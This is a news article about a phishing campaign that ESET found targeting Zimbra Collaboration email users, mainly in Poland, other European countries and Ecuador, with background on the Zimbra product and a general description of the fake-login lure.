Slovak software company ESET discovered a vast phishing campaign on several Zimbra users across Europe and South America.
What is Zimbra Collaboration?
LiquidSys originally developed Zimbra Collaboration Suite (ZCS) and on July 26, 2005, changed its name to Zimbra Inc. It’s a set of email and collaboration software tools, designed to improve communication and collaboration in organizations.
It has features like email, calendars, contacts, tasks and file sharing. This tool’s web-based interface is well-known and supports various clients including desktop email clients, mobile devices, and web browsers.
Zimbra Collaboration comes in various editions, including open-source editions and commercial editions with additional features and support options. It can be deployed on-premises or in the cloud, offering flexibility in how organizations choose to implement and manage their collaboration infrastructure.
This open-platform solution allows users to manage and control their data the way they want it, and keep them secure and private at the same time. Because it’s integrable and customisable, users can only pay for the features they need for the time being and can add them as their business grows. They can incorporate their email with desktop clients such as Apple Mail, Thunderbird, and Outlook.
Phishing Campaign Compromised Users’ Accounts
Countless business and individual users of Zimbra have been compromised as hackers accessed their accounts through a phishing scam. It’s a shady practice of sending emails or other messages posing as credible companies, convincing users to disclose personal information. These pertinent details may include passwords or credit card numbers and CVV.
The fraudulent scheme has been ongoing since April of this year. It targets various small and medium businesses and government bodies. Based on research, the biggest number of targets are in Poland. Victims from other European countries were not spared as well as France, Ukraine, the Netherlands, and Italy. In Latin America, Ecuador leads the list of identifications.
Usually, the target will receive an email with a phishing page in the linked HTML file. The email warns the recipient of an email server update, deactivation of the account, or any similar issues. Afterwards, it will prompt the user with a fake tailored Zimbra login page based on the targeted organisation.
Hackers will collect the victim’s information from the HTML form and will have control over the affected email account. They could also compromise the victim’s administrator accounts and produce new mailboxes they can use to send phishing emails to other subjects.
“The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries,” ESET said.
A number of phishing emails were sent from Zimbra accounts of precedently targeted, authorised companies. It’s uncertain how administrator accounts were phished, however, ESET believed that using the same password for both email and administration could be the reason.
Image Credit: Tima Miroshnichenko/Pexels